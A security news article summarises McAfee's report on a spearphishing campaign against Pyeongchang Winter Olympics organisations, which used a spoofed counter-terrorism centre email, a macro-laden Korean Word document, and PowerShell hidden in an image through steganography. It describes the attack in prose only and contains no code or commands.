Stealth Malware Targets Pyeongchang Olympics Organisations

Researchers have uncovered a complex malware campaign targeting organisations involved in this winter’s Pyeongchang Olympics in South Korea – disguised, ironically, as an email from the country’s national security services.

The campaign began on 22 December, with attackers quickly adopting newly released tools to help disguise their malicious code, said computer security firm McAfee.

The malware-infected email is spoofed so that it appears to come from info@nctc.go.kr, an address used by South Korea’s National Counter-Terrorism Center (NCTC).

“The timing is interesting because the NCTC was in the process of conducting physical antiterror drills in the region in preparation for the Olympic Games,” McAfee said in an advisory. “The spoofed source of this email suggests the message is legitimate and increases the chances that victims will treat it as such.”

Infected attachment

The real sender was an IP address in Singapore, McAfee said.

The email was initially sent to icehockey@pyeongchang2018.com, with a number of other South Korean organisations listed in the BCC line, most involved either in providing infrastructure or support for the Olympics.

The email included an infected attachment with a Korean-language title that translates as
“Organised by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”.

Initially the attachers used a hypertext application (HTA) file to install malware on targets’ computers, but they quickly shifted to another method that involves hiding the malicious code in an image file, a technique called steganography.

To do so they used a tool released only days earlier, demonstrating their quick adoption of new techniques, McAfee said.

The attackers’ elaborate methods are designed to bypass security software that might otherwise detect and block the malicious code being downloaded and executed on users’ systems.

Disguised scripts

Techniques such as email spoofing and the use of the Korean language help make the malicious document appear legitimate, McAfee said.

The latest malicious attachment is a Word document written in Korean that asks users to enable content. If they do so, a Visual Basic macro launches a PowerShell script that downloads an image file from a remote server.

It then reads and executes another PowerShell script hidden in the image. This second script establishes a link to a server in the Czech Republic, which gives the attackers the ability to execute commands remotely on the target’s machine.

Both scripts are heavily disguised, McAfee said.

“The attacker’s objective is to make analysis difficult and to evade detection technologies that rely on pattern matching,” the researchers wrote.

To hide the code in the image the attackers used Invoke-PSImage, an open source tool only released on 20 December.

McAfee found that the Czech server belongs to a legitimate organisation, suggesting it was hacked for use in distributing malware.

The hackers’ efforts appear to have paid off, researchers said, since a log for the Czech control server indicated that IP addresses from South Korea were connecting to the URLs contained in the malware.

In-memory implant

“This indicates that the implant was active in South Korea and targets were likely being infected,” McAfee said.

The use of in-memory PowerShell implants is an increasingly common technique that doesn’t require files to be stored on the targets’ systems, with the malware running entirely in-memory.

McAfee said it was the first time the technique had been observed targeting South Korean organisations. In the past attackers have tended to target vulnerabilities in Hangul, a popular South Korean word-processing program.

“With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes,” McAfee said. “In similar past cases, the victims were targeted for their passwords and financial information.”

Do you know all about security? Try our quiz!